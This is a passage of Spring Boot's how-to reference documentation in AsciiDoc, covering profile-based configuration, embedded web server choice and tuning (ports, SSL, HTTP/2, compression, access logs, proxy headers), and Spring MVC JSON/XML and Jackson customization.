example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting but not by the `SpringApplicationBuilder.profiles()` method.\nThus, the latter Java API can be used to augment the profiles without changing the defaults.\n\nSee \"`<<spring-boot-features.adoc#boot-features-profiles>>`\" in the \"`Spring Boot features`\" section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change Configuration Depending on the Environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each document is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value (a comma-separated list of profiles) is fed into the Spring `Environment.acceptsProfiles()` method.\nIf any of those profiles is active, that document is included in the final merge (otherwise, it is not), as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn the preceding example, the default port is 9000.\nHowever, if the Spring profile called '`development`' is active, then the port is 9001.\nIf '`production`' is active, then the port is 0.\n\nNOTE: The YAML documents are merged in the order in which they are encountered.\nLater values override earlier values.\n\nTo do the same thing with properties files, you can use `application-$\\{profile}.properties` to specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover Built-in Options for External Properties\nSpring Boot binds external properties from `application.properties` (or `.yml` files and other places) into an application at runtime.\nThere is not (and technically cannot be) an exhaustive list of all supported properties in a single location, because contributions can come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows all the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties.adoc#common-application-properties, `application.properties`>> example with a list of the most common properties supported by Spring Boot.\nThe definitive list comes from searching the source code for `@ConfigurationProperties` and `@Value` annotations as well as the occasional use of `Binder`.\nFor more about the exact ordering of loading properties, see \"<<spring-boot-features#boot-features-external-config>>\".\n\n\n\n[[howto-embedded-web-servers]]\n== Embedded Web Servers\nEach Spring Boot web application includes an embedded web server.\nThis feature leads to a number of how-to questions, including how to change the embedded server and how to configure the embedded server.\nThis section answers those questions.\n\n\n\n[[howto-use-another-web-server]]\n=== Use Another Web Server\nMany Spring Boot starters include default embedded containers.\n\n* For servlet stack applications, the `spring-boot-starter-web` includes Tomcat by including `spring-boot-starter-tomcat`, but you can use `spring-boot-starter-jetty` or `spring-boot-starter-undertow` instead.\n* For 
reactive stack applications, the `spring-boot-starter-webflux` includes Reactor Netty by including `spring-boot-starter-reactor-netty`, but you can use `spring-boot-starter-tomcat`, `spring-boot-starter-jetty`, or `spring-boot-starter-undertow` instead.\n\nWhen switching to a different HTTP server, you need to exclude the default dependencies in addition to including the one you need.\nSpring Boot provides separate starters for HTTP servers to help make this process as easy as possible.\n\nThe following Maven example shows how to exclude Tomcat and include Jetty for Spring MVC:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<servlet-api.version>3.1.0<\/servlet-api.version>\n\t<\/properties>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<!-- Exclude the Tomcat dependency -->\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<!-- Use Jetty instead -->\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The version of the Servlet API has been overridden as, unlike Tomcat 9 and Undertow 2.0, Jetty 9.4 does not support Servlet 4.0.\n\nThe following Gradle example shows how to exclude Netty and include Undertow for Spring WebFlux:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\timplementation('org.springframework.boot:spring-boot-starter-webflux') {\n\t\t exclude group: 'org.springframework.boot', module: 'spring-boot-starter-reactor-netty'\n\t\t}\n\t\t\/\/ Use Undertow instead\n\t\timplementation 'org.springframework.boot:spring-boot-starter-undertow'\n\t\t\/\/ ...\n\t}\n----\n\nNOTE: `spring-boot-starter-reactor-netty` is required to use the `WebClient` class, so you may need to keep a dependency on Netty even when you include a different HTTP server.\n\n\n\n[[howto-disable-web-server]]\n=== Disabling the Web Server\nIf your classpath contains the necessary bits to start a web server, Spring Boot will automatically start it.\nTo disable this behavior, configure the `WebApplicationType` in your `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.main.web-application-type=none\n----\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP Port\nIn a standalone application, the main HTTP port defaults to `8080` but can be set with configprop:server.port[] (for example, in `application.properties` or as a System property).\nThanks to relaxed binding of `Environment` values, you can also use configprop:server.port[format=envvar] (for example, as an OS environment variable).
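\n\nFor example, the following `application.properties` entry moves the application to port 8081 (the value is arbitrary):\n\n[source,properties,indent=0,configprops]\n----\n\tserver.port=8081\n----\n\nTo switch off the HTTP endpoints completely but still create a `WebApplicationContext`, use `server.port=-1` (doing so is sometimes useful for testing).\n\nFor more details, see \"`<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>`\" in the '`Spring Boot Features`' section, or the {spring-boot-autoconfigure-module-code}\/web\/ServerProperties.java[`ServerProperties`] source code.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a Random Unassigned HTTP Port\nTo scan for a free port (using OS natives to prevent clashes), use 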
`server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP Port at Runtime\nYou can access the port the server is running on from log output or from the `ServletWebServerApplicationContext` through its `WebServer`.\nThe best way to get that and be sure that it has been initialized is to add a `@Bean` of type `ApplicationListener<ServletWebServerInitializedEvent>` and pull the container out of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can also inject the actual port into a field by using the `@LocalServerPort` annotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tServletWebServerApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`.\nDo not try to inject the port in a regular application.\nAs we just saw, the value is set only after the container has been initialized.\nContrary to a test, application code callbacks are processed early (before the value is actually available).\n====\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP Response Compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow.\nIt can be enabled in `application.properties`, as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be performed.\nYou can configure this behavior by setting the configprop:server.compression.min-response-size[] property.\n\nBy default, responses are compressed only if their content type is one of the following:\n\n* `text\/html`\n* `text\/xml`\n* `text\/plain`\n* `text\/css`\n* `text\/javascript`\n* `application\/javascript`\n* `application\/json`\n* `application\/xml`\n\nYou can configure this behavior by setting the configprop:server.compression.mime-types[] property.\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties, typically in `application.properties` or `application.yml`.\nThe following example shows setting SSL properties in `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {spring-boot-module-code}\/web\/server\/Ssl.java[`Ssl`] for details of all of the supported properties.\n\nUsing configuration such as the preceding example means the application no longer supports a plain HTTP connector at port 8080.\nSpring Boot does not support the configuration of both an HTTP connector and an HTTPS connector through `application.properties`.\nIf you want to have both, you need to configure one of them programmatically.\nWe recommend using `application.properties` to configure HTTPS, as the HTTP connector is the easier of the two to configure programmatically.\n\n\n\n[[howto-configure-http2]]\n=== Configure HTTP\/2\nYou can enable HTTP\/2 support in your Spring Boot application with the configprop:server.http2.enabled[] configuration property.\nThis support depends on 
the chosen web server and the application environment, since that protocol is not supported out of the box by JDK 8.\n\n[NOTE]\n====\nSpring Boot does not support `h2c`, the cleartext version of the HTTP\/2 protocol.\nSo you must <<howto-configure-ssl, configure SSL first>>.\n====\n\n\n\n[[howto-configure-http2-undertow]]\n==== HTTP\/2 with Undertow\nAs of Undertow 1.4.0, HTTP\/2 is supported without any additional requirements on JDK 8.\n\n\n\n[[howto-configure-http2-jetty]]\n==== HTTP\/2 with Jetty\nAs of Jetty 9.4.8, HTTP\/2 is also supported with the https:\/\/www.conscrypt.org\/[Conscrypt library].\nTo enable that support, your application needs to have two additional dependencies: `org.eclipse.jetty:jetty-alpn-conscrypt-server` and `org.eclipse.jetty.http2:http2-server`.\n\n\n\n[[howto-configure-http2-tomcat]]\n==== HTTP\/2 with Tomcat\nSpring Boot ships by default with Tomcat 9.0.x, which supports HTTP\/2 out of the box when using JDK 9 or later.\nAlternatively, HTTP\/2 can be used on JDK 8 if the `libtcnative` library and its dependencies are installed on the host operating system.\n\nThe library directory must be made available, if not already, to the JVM library path.\nYou can do so with a JVM argument such as `-Djava.library.path=\/usr\/local\/opt\/tomcat-native\/lib`.\nMore details are available in the https:\/\/tomcat.apache.org\/tomcat-9.0-doc\/apr.html[official Tomcat documentation].\n\nStarting Tomcat 9.0.x on JDK 8 without that native support logs the following error:\n\n[indent=0,subs=\"attributes\"]\n----\n\tERROR 8787 --- [ main] o.a.coyote.http11.Http11NioProtocol : The upgrade handler [org.apache.coyote.http2.Http2Protocol] for [h2] only supports upgrade via ALPN but has been configured for the [\"https-jsse-nio-8443\"] connector that does not support ALPN.\n----\n\nThis error is not fatal, and the application still starts with HTTP\/1.1 SSL support.\n\n\n\n[[howto-configure-http2-netty]]\n==== HTTP\/2 with Reactor Netty\nBy default, the `spring-boot-starter-webflux` uses Reactor Netty as the server.\nReactor Netty can be configured for HTTP\/2 using the JDK support with JDK 9 or later.\nFor JDK 8 environments, or for optimal runtime performance, this server also supports HTTP\/2 with native libraries.\nTo enable that, your application needs to have an additional dependency.\n\nSpring Boot manages the version for the `io.netty:netty-tcnative-boringssl-static` \"uber jar\", containing native libraries for all platforms.\nDevelopers can choose to import only the required dependencies by using a classifier (see https:\/\/netty.io\/wiki\/forked-tomcat-native.html[the Netty official documentation]).\n\n\n\n[[howto-configure-webserver]]\n=== Configure the Web Server\nGenerally, you should first consider using one of the many available configuration keys and customize your web server by adding new entries in your `application.properties` (or `application.yml`, or the environment; 
see \"`<<howto-discover-build-in-options-for-external-properties>>`\").\nThe `server.{asterisk}` namespace is quite useful here, and it includes namespaces like `server.tomcat.{asterisk}`, `server.jetty.{asterisk}` and others, for server-specific features.\nSee the list of <<appendix-application-properties.adoc#common-application-properties>>.\n\nThe previous sections covered already many common use cases, such as compression, SSL or HTTP\/2.\nHowever, if a configuration key doesn't exist for your use case, you should then look at {spring-boot-module-api}\/web\/server\/WebServerFactoryCustomizer.html[`WebServerFactoryCustomizer`].\nYou can declare such a component and get access to the server factory relevant to your choice: you should select the variant for the chosen Server (Tomcat, Jetty, Reactor Netty, Undertow) and the chosen web stack (Servlet or Reactive).\n\nThe example below is for Tomcat with the `spring-boot-starter-web` (Servlet stack):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class MyTomcatWebServerCustomizer\n\t\t\timplements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {\n\n\t\t@Override\n\t\tpublic void customize(TomcatServletWebServerFactory factory) {\n\t\t\t\/\/ customize the factory here\n\t\t}\n\t}\n----\n\nIn addition Spring Boot provides:\n\n[[howto-configure-webserver-customizers]]\n[cols=\"1,2,2\", options=\"header\"]\n|===\n| Server | Servlet stack | Reactive stack\n\n| Tomcat\n| `TomcatServletWebServerFactory`\n| `TomcatReactiveWebServerFactory`\n\n| Jetty\n| `JettyServletWebServerFactory`\n| `JettyReactiveWebServerFactory`\n\n| Undertow\n| `UndertowServletWebServerFactory`\n| `UndertowReactiveWebServerFactory`\n\n| Reactor\n| N\/A\n| `NettyReactiveWebServerFactory`\n|===\n\nOnce you've got access to a `WebServerFactory`, you can often add customizers to it to configure specific parts, like connectors, server resources, or the server itself - all using server-specific APIs.\n\nAs a last resort, you can also declare your own `WebServerFactory` component, which will override the one provided by Spring Boot.\nIn this case, you can't rely on configuration properties in the `server` namespace anymore.\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter, or Listener to an Application\nIn a servlet stack application, i.e. 
with the `spring-boot-starter-web`, there are two ways to add `Servlet`, `Filter`, `ServletContextListener`, and the other listeners supported by the Servlet API to your application:\n\n* <<howto-add-a-servlet-filter-or-listener-as-spring-bean>>\n* <<howto-add-a-servlet-filter-or-listener-using-scanning>>\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter, or Listener by Using a Spring Bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` by using a Spring bean, you must provide a `@Bean` definition for it.\nDoing so can be very useful when you want to inject configuration or dependencies.\nHowever, you must be very careful that they do not cause eager initialization of too many other beans, because they have to be installed in the container very early in the application lifecycle.\n(For example, it is not a good idea to have them depend on your `DataSource` or JPA configuration.)\nYou can work around such restrictions by initializing the beans lazily when first used instead of on initialization.\n\nIn the case of `Filters` and `Servlets`, you can also add mappings and init parameters by adding a `FilterRegistrationBean` or a `ServletRegistrationBean` instead of or in addition to the underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, `REQUEST` is used.\nThis aligns with the Servlet Specification's default dispatcher type.\n====\n\nLike any other Spring bean, you can define the order of Servlet filter beans; please make sure to check the \"`<<spring-boot-features.adoc#boot-features-embedded-container-servlets-filters-listeners-beans>>`\" section.\n\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable Registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described earlier>>, any `Servlet` or `Filter` beans are registered with the servlet container automatically.\nTo disable registration of a particular `Filter` or `Servlet` bean, create a registration bean for it and mark it as disabled, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners by Using Classpath Scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically registered with an embedded servlet container by annotating a `@Configuration` class with `@ServletComponentScan` and specifying the package(s) containing the components that you want to register.\nBy default, `@ServletComponentScan` scans from the package of the annotated class.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat, Undertow, and Jetty through their respective namespaces.\n\nFor instance, the following settings log access on Tomcat with a {tomcat-docs}\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the Tomcat base directory.\nBy default, 
the `logs` directory is a temporary directory, so you may want to fix Tomcat's base directory or use an absolute path for the logs.\nIn the preceding example, the logs are available in `my-tomcat\/logs` relative to the working directory of the application.\n\nAccess logging for Undertow can be configured in a similar fashion, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the application.\nYou can customize this location by setting the configprop:server.undertow.accesslog.dir[] property.\n\nFinally, access logging for Jetty can also be configured as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.jetty.accesslog.enabled=true\n\tserver.jetty.accesslog.filename=\/var\/log\/jetty-access.log\n----\n\nBy default, logs are redirected to `System.err`.\nFor more details, see {jetty-docs}\/configuring-jetty-request-logs.html[the Jetty documentation].\n\n\n\n[[howto-use-behind-a-proxy-server]]\n=== Running Behind a Front-end Proxy Server\nIf your application is running behind a proxy or a load balancer, or in the cloud, the request information (such as the host, port, and scheme) might change along the way.\nYour application may be running on `10.10.10.10:8080`, but HTTP clients should only see `example.org`.\n\nhttps:\/\/tools.ietf.org\/html\/rfc7239[RFC7239 \"Forwarded Headers\"] defines the `Forwarded` HTTP header; proxies can use this header to provide information about the original request.\nYou can configure your application to read those headers and automatically use that information when creating links and sending them to clients in HTTP 302 responses, JSON documents, or HTML pages.\nThere are also non-standard headers, like `X-Forwarded-Host`, `X-Forwarded-Port`, `X-Forwarded-Proto`, `X-Forwarded-Ssl`, and `X-Forwarded-Prefix`.\n\nIf the proxy adds the commonly used `X-Forwarded-For` and `X-Forwarded-Proto` headers, setting `server.forward-headers-strategy` to `NATIVE` is enough to support those.\nWith this option, the web servers themselves natively support this feature; you can check their specific documentation to learn about their behavior.\n\nIf this is not enough, Spring Framework provides a {spring-framework-docs}\/web.html#filters-forwarded-headers[ForwardedHeaderFilter].\nYou can register it as a servlet filter in your application by setting `server.forward-headers-strategy` to `FRAMEWORK`.\n\nNOTE: If your application runs in Cloud Foundry or Heroku, the configprop:server.forward-headers-strategy[] property defaults to `NATIVE`.\nIn all other instances, it defaults to `NONE`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's Proxy Configuration\nIf you use Tomcat, you can additionally configure the names of the headers used to carry \"`forwarded`\" information, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remoteip.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.remoteip.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal proxies that are to be trusted.\nBy default, IP addresses in `10\/8`, `192.168\/16`, `169.254\/16`, and `127\/8` are trusted.\nYou can customize the valve's configuration by adding an entry to 
`application.properties`, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remoteip.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are required only when you use a properties file for configuration.\nIf you use YAML, single backslashes are sufficient, and a value equivalent to that shown in the preceding example would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but do not do so in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by switching the automatic one off (to do so, set `server.forward-headers-strategy=NONE`) and adding a new valve instance in a `TomcatServletWebServerFactory` bean.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nYou can add an `org.apache.catalina.connector.Connector` to the `TomcatServletWebServerFactory`, which can allow multiple connectors, including HTTP and HTTPS connectors, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletWebServerFactory servletContainer() {\n\t\tTomcatServletWebServerFactory tomcat = new TomcatServletWebServerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + keystore\n\t\t\t\t\t+ \"] or truststore: [\" + truststore + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nBy default, the embedded Tomcat used by Spring Boot does not support \"Version 0\" of the Cookie format, so you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values compliant with later Cookie specifications.\nIf, however, you cannot change the way that cookies are written, you can instead configure Tomcat to use a `LegacyCookieProcessor`.\nTo switch to the `LegacyCookieProcessor`, use an `WebServerFactoryCustomizer` bean that adds a `TomcatContextCustomizer`, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n\n\n\n[[howto-enable-tomcat-mbean-registry]]\n=== Enable Tomcat's MBean Registry\nEmbedded Tomcat's MBean registry is disabled by default.\nThis minimizes Tomcat's memory footprint.\nIf you want to use Tomcat's MBeans, for example so 
that they can be used to expose metrics via Micrometer, you must enable the registry by setting the configprop:server.tomcat.mbeanregistry.enabled[] property, as shown in the following example:\n\n[source,properties,indent=0,configprops]\n----\nserver.tomcat.mbeanregistry.enabled=true\n----\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowServletWebServerFactory` and add a listener to the `Builder`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowServletWebServerFactory servletWebServerFactory() {\n\t\tUndertowServletWebServerFactory factory = new UndertowServletWebServerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket Endpoints Using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that uses an embedded container, you must declare a single `ServerEndpointExporter` `@Bean`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThe bean shown in the preceding example registers any `@ServerEndpoint` annotated beans with the underlying WebSocket container.\nWhen deployed to a standalone servlet container, this role is performed by a servlet container initializer, and the `ServerEndpointExporter` bean is not required.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\nSpring Boot has a number of starters that include Spring MVC.\nNote that some starters include a dependency on Spring MVC rather than including it directly.\nThis section answers common questions about Spring MVC and Spring Boot.\n\n\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST Service\nAny Spring `@RestController` in a Spring Boot application should render JSON responses by default as long as Jackson2 is on the classpath, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (true for a normal POJO or Groovy object), then `http:\/\/localhost:8080\/thing` serves a JSON representation of it by default.\nNote that, in a browser, you might sometimes see XML responses, because browsers tend to send `Accept` headers that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST Service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, you can use it to render XML responses.\nThe previous example that we used for JSON would work as well.\nTo use the Jackson XML renderer, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available and JAXB is available, XML can be rendered with the additional requirement of having 
`MyThing` annotated as `@XmlRootElement`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nJAXB is only available out of the box with Java 8.\nIf you're using a more recent Java generation, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.glassfish.jaxb<\/groupId>\n\t\t<artifactId>jaxb-runtime<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: To get the server to render XML instead of JSON, you might have to send an `Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content conversion in an HTTP exchange.\nIf Jackson is on the classpath, you already get the default converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which is auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for Jackson XML converter) instance (created by default) has the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n* `SerializationFeature.WRITE_DATES_AS_TIMESTAMPS` is disabled\n\nSpring Boot also has some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances by using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to configure various aspects of its processing.\nThese features are described in six enums (in Jackson) that map onto properties in the environment:\n\n|===\n| Enum | Property | Values\n\n| `com.fasterxml.jackson.databind.DeserializationFeature`\n| `spring.jackson.deserialization.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.core.JsonGenerator.Feature`\n| `spring.jackson.generator.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.databind.MapperFeature`\n| `spring.jackson.mapper.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.core.JsonParser.Feature`\n| `spring.jackson.parser.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.databind.SerializationFeature`\n| `spring.jackson.serialization.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.annotation.JsonInclude.Include`\n| configprop:spring.jackson.default-property-inclusion[]\n| `always`, `non_null`, `non_absent`, `non_default`, `non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<spring-boot-features.adoc#boot-features-external-config-relaxed-binding, relaxed binding>>, the case of `indent_output` does not have to match the case of the corresponding enum constant, which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured `Jackson2ObjectMapperBuilder` bean and applies to any mappers created by using the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more `Jackson2ObjectMapperBuilderCustomizer` beans.\nSuch customizer beans can be ordered (Boot's own customizer has an order of 0), letting additional customization be applied both before and after Boot's customization.\n\nAny beans of type 
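`Jackson2ObjectMapperBuilderCustomizer` are picked up automatically.\nAs a minimal sketch (the bean name is illustrative), the following customizer switches the default property inclusion:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic Jackson2ObjectMapperBuilderCustomizer jacksonCustomizer() {\n\t\t\/\/ applied on top of Boot's own customization of the builder\n\t\treturn (builder) -> builder.serializationInclusion(JsonInclude.Include.NON_NULL);\n\t}\n----\n\nSimilarly, any beans of type 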
`com.fasterxml.jackson.databind.Module` are automatically registered with the auto-configured `Jackson2ObjectMapperBuilder` and are applied to any `ObjectMapper` instances that it creates.\nThis provides a global mechanism for contributing custom modules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of that type and mark it as `@Primary` or, if you prefer the builder-based approach, define a `Jackson2ObjectMapperBuilder` `@Bean`.\nNote that, in either case, doing so disables all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter`, they replace the default value in the MVC configuration.\nAlso, a convenience bean of type `HttpMessageConverters` is provided (and is always available if you use the default MVC configuration).\nIt has some useful methods to access the default and user-enhanced message converters.\n\nSee the \"`<<howto-customize-the-responsebody-rendering>>`\" section and the {spring-boot-autoconfigure-module-code}\/web\/servlet\/WebMvcAutoConfiguration.java[`WebMvcAutoConfiguration`] source code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody Rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from 